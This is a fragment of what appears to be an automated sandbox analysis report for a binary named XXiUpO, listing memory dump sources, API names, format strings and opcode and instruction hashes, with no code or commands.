                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-484248852
                                  • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                  • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                  • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                  • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                  APIs
                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDAC09112F), ref: 00007FFDAC0939E0
                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFDAC09112F), ref: 00007FFDAC093A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                  • Instruction ID: 1c56fc297bbdcc685cb8eb47ee5de7dffa673aeadde868ed4ef350ff670a4c14
                                  • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                  • Instruction Fuzzy Hash: A4115B32609B8182EB208B19E41036A77E4FB88B94F584230DFCD07B59DF3CD961CB08
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-3336177065
                                  • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                  • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                  • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                  • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                  • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                  • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                  • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710